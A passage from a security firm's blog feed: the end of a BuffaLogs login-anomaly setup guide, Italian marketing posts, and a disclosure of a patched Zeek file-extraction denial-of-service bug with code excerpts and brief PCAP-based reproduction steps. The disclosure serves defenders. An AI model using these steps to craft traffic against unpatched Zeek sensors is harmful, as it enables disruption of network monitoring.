&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;output.elasticsearch:
  hosts: [&quot;https://localhost:9200&quot;]
  username: &quot;elastic&quot;
  password: &quot;********&quot; 
  ssl:
    enabled: true
    verification_mode: &quot;none&quot;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Lastly, start the filebeat service: &lt;strong&gt;sudo systemctl start filebeat.service&lt;/strong&gt; and you can inspect the BuffaLogs detection alerts on the GUI at &lt;strong&gt;localhosy:8000&lt;/strong&gt; or in the Django admin at &lt;strong&gt;localhost:8000/admin/&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Finally, start the filebeat service: &lt;strong&gt;sudo systemctl start filebeat.service&lt;/strong&gt; and you will see login logs on &lt;strong&gt;filebeat-&lt;/strong&gt;* index on Elasticsearch. BuffaLogs detection alerts and info are available on the GUI at &lt;strong&gt;BUFFALOGS_IP:8000&lt;/strong&gt; or in the Django admin at &lt;strong&gt;BUFFALOGS_IP:8000/admin/&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;In particular, the results obtained are divided into different tables:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;User: with the list of all the accounts and the relative risk level calculated;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/d486fca2ce8bb0725a878f977c516742/a878e/buffalogs_users_django_admin.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 14.583333333333334%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAIAAAAcOLh5AAAACXBIWXMAAAsTAAALEwEAmpwYAAAAU0lEQVR42nWNUQrAMAhDvYSttlqxu/8dGzZWNtjyockTIrXWSinMXE/B17f+SGaSqvbe5zFhUBQRmHrrk4wxYESEkLDcffeZ2f6GEwjan+SKIrIAM/8RmNRtTP4AAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Users&quot;
        title=&quot;&quot;
        src=&quot;/website/static/d486fca2ce8bb0725a878f977c516742/71c1d/buffalogs_users_django_admin.png&quot;
        srcset=&quot;/website/static/d486fca2ce8bb0725a878f977c516742/804b2/buffalogs_users_django_admin.png 384w,
/website/static/d486fca2ce8bb0725a878f977c516742/e5715/buffalogs_users_django_admin.png 768w,
/website/static/d486fca2ce8bb0725a878f977c516742/71c1d/buffalogs_users_django_admin.png 1536w,
/website/static/d486fca2ce8bb0725a878f977c516742/a878e/buffalogs_users_django_admin.png 2048w&quot;
        sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Login: that contains the logins, unique for country and user-agent&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/285a4710ebe51c1a905a683b919de4f4/a878e/buffalogs_logins_django_admin.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 18.75%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAIAAAABPYjBAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAd0lEQVR42nWOUQ6EIAxEuYRsoSBZDEXg/vfbkbpRP5wP0nktmTHe+2Xqc8la+2Ke0OAzM4cpInLOqQWH1RmvcpyePLAjMluR1hoWdd+lFJzmnEWk1gr4/SuldMQc2w3zGKP3buBjjOgQ4hmOIy0C6G/SwjzD16kfuykZrmWgOG4AAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Logins&quot;
        title=&quot;&quot;
        src=&quot;/website/static/285a4710ebe51c1a905a683b919de4f4/71c1d/buffalogs_logins_django_admin.png&quot;
        srcset=&quot;/website/static/285a4710ebe51c1a905a683b919de4f4/804b2/buffalogs_logins_django_admin.png 384w,
/website/static/285a4710ebe51c1a905a683b919de4f4/e5715/buffalogs_logins_django_admin.png 768w,
/website/static/285a4710ebe51c1a905a683b919de4f4/71c1d/buffalogs_logins_django_admin.png 1536w,
/website/static/285a4710ebe51c1a905a683b919de4f4/a878e/buffalogs_logins_django_admin.png 2048w&quot;
        sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Alert: with the triggered alert and the relative login information&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/f519e419f4932f8f1b00d389d379ecbf/a878e/buffalogs_alerts_django_admin.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 25%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAIAAADKYVtkAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAlUlEQVR42l2OSxKEIAxEuYQGAwnyEfYuvP/Rpg3DLOYV1dX5EncY27YR0b6gnSbws/QHRjSpS2eOIidICXEy4kJVcz5jCDMMZqDee6xwrY92Xc2oxhjjMpCBv++79478rwGGmSMfLtdW6pdSCgpzDDIXPc8DRWl1vcP4n713ojhS1nvvFFF48IoqWpG0q2UqsszBE30AYKUjw3hVMScAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Alert&quot;
        title=&quot;&quot;
        src=&quot;/website/static/f519e419f4932f8f1b00d389d379ecbf/71c1d/buffalogs_alerts_django_admin.png&quot;
        srcset=&quot;/website/static/f519e419f4932f8f1b00d389d379ecbf/804b2/buffalogs_alerts_django_admin.png 384w,
/website/static/f519e419f4932f8f1b00d389d379ecbf/e5715/buffalogs_alerts_django_admin.png 768w,
/website/static/f519e419f4932f8f1b00d389d379ecbf/71c1d/buffalogs_alerts_django_admin.png 1536w,
/website/static/f519e419f4932f8f1b00d389d379ecbf/a878e/buffalogs_alerts_django_admin.png 2048w&quot;
        sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;BuffaLogs updates its data once every 30 minutes, so you have to wait a little bit to see some data. Otherwise, if you want to launch the detection manually, you can run the different management commands available, depending on your purpose:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;to start the detection for the last 30 minutes, run &lt;strong&gt;python ./manage.py impossible_travel&lt;/strong&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;to execute the detection for a given date, use &lt;strong&gt;python ./manage.py impossible_travel &amp;#x3C;start_date&gt; &amp;#x3C;end_date&gt;&lt;/strong&gt;, for example: **python ./manage.py impossible_travel 2023-05-25 8:30:00 2023-05-25 14:30:00`&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;4. Full featured log-in analysis in PanOptikon®&lt;/h2&gt;
&lt;p&gt;Knowledge and technology used to build BuffaLogs are already integrated on Certego PanOptikon®, our proprietary Security Orchestration, Automation, and Response (SOAR) platform that enables real-time monitoring, incident analysis, and response activities, as well as direct interaction between the client&apos;s IT team and Certego&apos;s Detection &amp;#x26; Response team. This will allow Certego to have full control over its detection mechanism and it can be personalized for the needs of your organization.
Leveraging the information provided by our sensors and Threat Intelligence platform we have tailored BuffaLogs detection around our customers data: this allowed us to reduce false positive and improved detection compared to other solutions.&lt;/p&gt;
&lt;h2&gt;5. Would you like to collaborate with us?&lt;/h2&gt;
&lt;p&gt;In Certego, we strongly believe in the developers community. In the past, we have already released several open-source solutions, such as IntelOwl, which is Certego&apos;s Open Source Intelligence (#OSINT) solution. It has been a long-standing presence in the top 5 of the most famous open-source Threat Intelligence projects on the #GitHub platform, with over 2800 reviews.
For this reason, BuffaLogs&apos; basic detection logics were published with an open source license.
In addition, BuffaLogs has attended the &lt;a href=&quot;https://summerofcode.withgoogle.com/&quot;&gt;Google Summer of Code 2023&lt;/a&gt; and one of the students is improving the graphical interface of the application, adapting it to the Certego UI.
For more contributions or ideas, please visit the &lt;a href=&quot;https://github.com/certego/BuffaLogs&quot;&gt;BuffaLogs GitHub page&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Health matters: start your authentication system check-up now!&lt;/strong&gt;&lt;/h3&gt;</content:encoded></item><item><title><![CDATA[Nuovo sito web Certego]]></title><description><![CDATA[Siamo felici di annunciare il lancio del nuovo sito web di Certego]]></description><link>https://www.certego.net/blog/nuovo-sito-web-certego/</link><guid isPermaLink="false">nuovo-sito-web-certego</guid><category><![CDATA[News]]></category><pubDate>Wed, 20 Sep 2023 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Siamo felici di annunciare il lancio del nuovo sito web di Certego.&lt;/p&gt;
&lt;p&gt;Il nuovo sito web presenta un design moderno, funzionalità migliorate e un accesso agevole a tutte le informazioni essenziali per aiutare le persone a scoprire i nostri servizi e prendere decisioni informate nel campo della sicurezza informatica.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Il nuovo sito aziendale fa parte dell&apos;evoluzione continua del brand Certego. In occasione dei nostri primi dieci anni di vita abbiamo scelto di adottare il concetto di natura come metafora del nostro lavoro, poiché proprio come la natura si adatta costantemente all&apos;ambiente circostante, la sicurezza informatica deve essere altamente adattabile per fronteggiare le minacce informatiche in evoluzione&lt;/strong&gt;&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;Abbiamo posto particolare attenzione nell&apos;assicurare che l&apos;esperienza dell&apos;utente sia il più semplice e intuitiva possibile, grazie a una struttura chiara e intuitiva che presenta in modo efficace le nostre soluzioni.&lt;/p&gt;
&lt;p&gt;Buona navigazione...&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Zeek's file extraction DoS vulnerability discovered by Certego]]></title><description><![CDATA[While using Zeek we identified a DoS vulnerability in the file extraction feature.]]></description><link>https://www.certego.net/blog/blog-zeek-file-extraction-bug/</link><guid isPermaLink="false">blog-zeek-file-extraction-bug</guid><category><![CDATA[Blog]]></category><category><![CDATA[Zeek]]></category><category><![CDATA[Bug]]></category><category><![CDATA[DoS]]></category><dc:creator><![CDATA[Luca Cigarini]]></dc:creator><pubDate>Tue, 19 Sep 2023 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Hi everyone, Luca Cigarini here from Threat Detection Team in Certego!&lt;/p&gt;
&lt;p&gt;While using Zeek, we detected a security vulnerabilty that was patched in the latest LTS version of the software (5.0.10 and 6.0.1).&lt;/p&gt;
&lt;p&gt;Since it was interesting, we decided to write a blog post about it.
But, before delving into the security issue let&apos;s talk briefly about Zeek.&lt;/p&gt;
&lt;h1&gt;What is Zeek?&lt;/h1&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 275px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/c7f48e0ff3ad0954bdfbc7d6249147fd/6b2ea/zeek-logo.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 33.09090909090909%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAPYAAAD2AFuR2M1AAABf0lEQVR42m1RS0oDQRDtTAYTSSQmk/n0r3oyGZIY4iZBxaBGNMEIikTRhXgA3XqBuYMXELeuFMGtG+/g0hO4MRewakCRaEPRVHfVe69eMcX5hBeL1SAIXArHcRbY35P5dWdm8iyG9VNZE7UGb3V7oRBNIURfBcGA3o0xoXZ1PUaSdrs9xzlvAUCZ/nzf97C2QUD4voG1edd1iykw76xMsk/Tbfvh45LdvuRTlsHABvAiVH+uuJogyZaUcgfjGDwvAiEONNcjvIeaAJFMBSoVwjRj9dzd217+5nUzYgxYkqTyTckskuIoikpaiGvl+x1sHoGEU5DyAjjvIsgY/86UEAnW6hSw8Dj17efPK/v+fV3GzRNTqSwxllgEgor2cbyQGmk0pdQyvilUd6R8tYqeG6w7DMOwiVOMkaTHBECft3pdd22YNuAYu+SJcU1ArBgO5eQZVIGTCFSdeohkhTiOc7Qc8hBJq4yMjsrlUgM3jSMdIej8P1u2Zjaemcmt75ovrlk8/lQofqcAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;ZeekLogo&quot;
        title=&quot;&quot;
        src=&quot;/website/static/c7f48e0ff3ad0954bdfbc7d6249147fd/6b2ea/zeek-logo.png&quot;
        srcset=&quot;/website/static/c7f48e0ff3ad0954bdfbc7d6249147fd/6b2ea/zeek-logo.png 275w&quot;
        sizes=&quot;(max-width: 275px) 100vw, 275px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Zeek&apos;s developers define the software as:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;a passive, open-source network traffic analyzer.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;So Zeek can be used alongside IDSs(intrusion detection systems) to gather more data regarding suspicious or malicious activities. As a matter of fact, IDSs often provide only necessary data, so alerts are very light from this point of view. To perform a complete analysis, and so to decide whether the alert represents a false or a true positive, analysts need a huge amount of data though. Therefore Zeek is able to gather context data, vital to analysts&apos; work.&lt;/p&gt;
&lt;h1&gt;File Extraction&lt;/h1&gt;
&lt;p&gt;A very cool feature provided by Zeek&apos;s &lt;strong&gt;File Analysis Framework&lt;/strong&gt; is file extraction. As stated in the official documentation:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Zeek can &lt;em&gt;carve&lt;/em&gt; files from network traffic.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;So, for example, Zeek is able to extract files from HTTP connections.&lt;/p&gt;
&lt;p&gt;This can be very useful to monitor file flowing through the network and, later, gather enriched data regarding the file it has just seen. This can be done, for example, by uploading the extracted file or hash on &lt;a href=&quot;https://www.virustotal.com&quot;&gt;VirusTotal&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Since huge files will take up a lot of space on disk and require more time for processing, it can be useful to set a maximum extraction size for files. This way, only files smaller than this limit will be extracted.&lt;/p&gt;
&lt;p&gt;Zeek provides a redefinable variable to achive that:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;FileExtract::default_limit&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Default value is 0, so unlimited.&lt;/p&gt;
&lt;p&gt;We decided to set it to 10 MiB and that&apos;s when we stumbled upon a weird situation.&lt;/p&gt;
&lt;h1&gt;DoS vulnerability&lt;/h1&gt;
&lt;p&gt;Even though we set the &lt;strong&gt;FileExtract::default_limit&lt;/strong&gt; to 10 MiB we still saw files bigger than the limit being extracted by Zeek.&lt;/p&gt;
&lt;p&gt;So we decided to do a bit of troubleshooting.&lt;/p&gt;
&lt;p&gt;We thought it was a misconfiguration in our Zeek set up. We re-tested our deployment and we didn&apos;t discover any issues with our configuration: files bigger than 10 MiB were not extracted.&lt;/p&gt;
&lt;p&gt;At this point we took a closer look to logs produced by the &lt;strong&gt;File Analysis Framework&lt;/strong&gt; (&lt;strong&gt;files.log&lt;/strong&gt;).&lt;/p&gt;
&lt;p&gt;A file weighting 410 MiB was extracted by Zeek as we can see in the picture below.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/a16fa5a2bfae57eb5ca86a21d42260c5/f4fb1/file-size.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 4.427083333333333%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAABCAIAAABR8BlyAAAACXBIWXMAAAsTAAALEwEAmpwYAAAARUlEQVR42mOwtrF1dXU3NjHV1NSysrJysHdwcHZ2VFPxU1e2U1EK01ANUlfxUlMJUlf1V1dxUlUO1lAN1lCxUlb0U1cBAImzDGRW7swRAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;file-size&quot;
        title=&quot;&quot;
        src=&quot;/website/static/a16fa5a2bfae57eb5ca86a21d42260c5/71c1d/file-size.png&quot;
        srcset=&quot;/website/static/a16fa5a2bfae57eb5ca86a21d42260c5/804b2/file-size.png 384w,
/website/static/a16fa5a2bfae57eb5ca86a21d42260c5/e5715/file-size.png 768w,
/website/static/a16fa5a2bfae57eb5ca86a21d42260c5/71c1d/file-size.png 1536w,
/website/static/a16fa5a2bfae57eb5ca86a21d42260c5/f4fb1/file-size.png 1766w&quot;
        sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;By delving deeper into Zeek&apos;s &lt;strong&gt;file.log&lt;/strong&gt;, we discovered that only ~1 MiB were seen of the 410 MiB! Also, according to Zeek, the software successfully extracted the first 10 MiB of data and then stopped processing the file.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/0f72683dfb8710b5e30757b0e1e49ddb/a878e/files-log.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 3.3854166666666665%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAABCAIAAABR8BlyAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAO0lEQVR42h3JOQ7AMAgFUd//bil8D0shbB9DY+LmaaQZEXhpMj/wpYrMFFEz7yD6WiDMvaqYpb3rd8c+zGk5b+KBXX0AAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;files-log&quot;
        title=&quot;&quot;
        src=&quot;/website/static/0f72683dfb8710b5e30757b0e1e49ddb/71c1d/files-log.png&quot;
        srcset=&quot;/website/static/0f72683dfb8710b5e30757b0e1e49ddb/804b2/files-log.png 384w,
/website/static/0f72683dfb8710b5e30757b0e1e49ddb/e5715/files-log.png 768w,
/website/static/0f72683dfb8710b5e30757b0e1e49ddb/71c1d/files-log.png 1536w,
/website/static/0f72683dfb8710b5e30757b0e1e49ddb/a878e/files-log.png 2048w&quot;
        sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;So how have we ended up with a 410 MiB file?&lt;/p&gt;
&lt;p&gt;We then decided to take a peek on the file raw data and we noticed that the first MiB was actual data while the rest was filled with zeros.&lt;/p&gt;
&lt;p&gt;Looking at Zeek&apos;s source code helps us to better understand what causes this issue.&lt;/p&gt;
&lt;p&gt;The &lt;a href=&quot;https://github.com/zeek/zeek/blob/fdaac58b9005bfd920fbdbab3dc0ec5179723516/src/file_analysis/analyzer/extract/Extract.cc&quot;&gt;Extract.cc&lt;/a&gt; file contains C++ code deputated to the file extraction. Here inside &lt;em&gt;zeek::file_analysis::detail&lt;/em&gt; namespace we can find &lt;strong&gt;Extract&lt;/strong&gt; class with two very important methods:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;em&gt;bool DeliverStream(const u_char* data, uint64_t len)&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;bool Undelivered(uint64_t offset, uint64_t len)&lt;/em&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The first one write &lt;strong&gt;len&lt;/strong&gt; number of bytes to of &lt;strong&gt;data&lt;/strong&gt; to the extracted file. Basically it reconstruct the file from the connection/packets.&lt;/p&gt;
&lt;p&gt;The second one &lt;strong&gt;write len number of undelivered bytes at offset distance from file start&lt;/strong&gt;. This is where Zeek&apos;s failto check extracted file size.
By taking a closer look of this method we can see the following statements:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;if ( depth == offset ){
   char* tmp = new char[len]();
   if ( fwrite(tmp, len, 1, file_stream) != 1 ){
      ...
   }
   delete[] tmp;
   depth += len;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Basically, here developers instructed Zeek to &lt;strong&gt;write&lt;/strong&gt; the len missing/undelivered bytes as zeroes into the extracted file.
Without a check on the maximum extraction size this caused two issues:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Extraction of very large files.&lt;/li&gt;
&lt;li&gt;A potential DoS (Denial of Service) issue. As a matter of fact:
&lt;blockquote&gt;
&lt;p&gt;Crafting files with large amounts of missing bytes&lt;/p&gt;
&lt;/blockquote&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;in them could cause Zeek to spend a long time processing data, allocate a lot
of main memory, and write a lot of data to disk. Due to the possibility of
receiving these packets from remote hosts, this is a DoS risk.&lt;/p&gt;
&lt;p&gt;To overcome this issue, developers enforced file size limits before doing anything on the file. If file has not exceeded extracted size limit, the following statement is run:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;fseek( file_stream, len + offset, SEEK_SET)&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Instead of actually writing zeroes on the file, they moved the file pointer to the end of undelivered bytes, creating a &lt;strong&gt;sparse file&lt;/strong&gt;.&lt;/p&gt;
&lt;h1&gt;Proof of concept&lt;/h1&gt;
&lt;p&gt;To reproduce this bug take the following steps:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Take a PCAP file with an HTTP connection containing a file (e.g. sniffing ubuntu iso download)&lt;/li&gt;
&lt;li&gt;Delete a chunk of the PCAP (e.g. an arbitrary amount of packets from the middle of the recording).&lt;/li&gt;
&lt;li&gt;Using &lt;a href=&quot;https://github.com/hosom/file-extraction&quot;&gt;Hosom file extraction module&lt;/a&gt; run Zeek in offline mode against our newly created PCAP file (e.g. zeek -C -r poc.pcap /path/to/local.zeek). &lt;strong&gt;Remember to import the module in local.zeek script file&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;Take a look at the extracted file with an hex editor (e.g. xxd).&lt;/li&gt;
&lt;/ol&gt;</content:encoded></item><item><title><![CDATA[Certego MDR, un servizio su misura]]></title><description><![CDATA[Moderni servizi di MDR basati su policy di sicurezza personalizzate]]></description><link>https://www.certego.net/blog/certego-mdr-un-servizio-su-misura/</link><guid isPermaLink="false">certego-mdr-un-servizio-su-misura</guid><category><![CDATA[Whitepaper]]></category><pubDate>Fri, 15 Sep 2023 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Nel panorama informatico odierno, ogni azienda deve affrontare sfide di sicurezza, ma le organizzazioni fronteggiano rischi informatici molto diversi in base
a dimensioni, settore, servizi e molti altri fattori.&lt;/p&gt;
&lt;p&gt;In Certego, comprendiamo che ogni azienda ha esigenze diverse di cybersecurity: i servizi MDR non possono essere un servizio uguale per tutti,
ma devono poter essere personalizzati in base agli specifici bisogni e caratteristiche di ogni azienda.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Scopri come Certego ti permette di avere una soluzione MDR personalizzata, perfettamente allineata con la tua infrastruttura, il tuo ambiente di
lavoro e le politiche di sicurezza aziendali.&lt;/strong&gt;&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;Compila il form e ricevi il PDF&lt;/p&gt;</content:encoded></item><item><title><![CDATA[SOC tradizionale VS Certego PanOptikon®]]></title><description><![CDATA[Scopri la differenza che la piattaforma MDR PanOptikon® può fare per te]]></description><link>https://www.certego.net/blog/soc-tradizionale-vs-certego-panoptikon/</link><guid isPermaLink="false">soc-tradizionale-vs-certego-panoptikon</guid><category><![CDATA[Whitepaper]]></category><pubDate>Thu, 14 Sep 2023 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Le difese convenzionali non sono più efficaci contro gli attacchi di ultima generazione.&lt;/p&gt;
&lt;p&gt;Grazie alla combinazione di tecnologia, competenze umane e informazioni sulle minacce, Certego propone una soluzione MDR di ultima generazione per bloccare
gli attacchi più innovativi.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Scopri i principali vantaggi della nostra soluzione MDR&lt;/strong&gt;&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;Compila il form e ricevi il PDF&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Certego - Intelligence Driven Managed Detection & Response]]></title><description><![CDATA[Scopri perché più di 150 aziende hanno già scelto Certego]]></description><link>https://www.certego.net/blog/certego-company-profile/</link><guid isPermaLink="false">certego-company-profile</guid><category><![CDATA[Whitepaper]]></category><pubDate>Wed, 13 Sep 2023 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Le difese convenzionali non sono più efficaci contro gli attacchi di ultima generazione.&lt;/p&gt;
&lt;p&gt;Oggi, qualsiasi organizzazione che desidera proteggersi efficacemente deve includere, oltre alle tecnologie di prevenzione, anche soluzioni di Managed Detection &amp;#x26; Response attive 24/7.&lt;/p&gt;
&lt;p&gt;Certego è il provider italiano di MDR con oltre 10 anni di esperienza nella lotta al cybercrime.&lt;/p&gt;
&lt;p&gt;L’azienda è composta da analisti di sicurezza pluricertificati e “cacciatori” di minacce altamente specializzati dedicati a indagini
approfondite per la ricerca e l’analisi degli attacchi, guidati da una piattaforma di analisi dati unica che da oltre 10 anni viene
costantemente sviluppata e potenziata per adattarsi e rispondere alle nuove tipologie di minacce.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Scopri perchè più di 150 aziende hanno già scelto di affidarsi a Certego&lt;/strong&gt;&lt;/em&gt;.&lt;/p&gt;
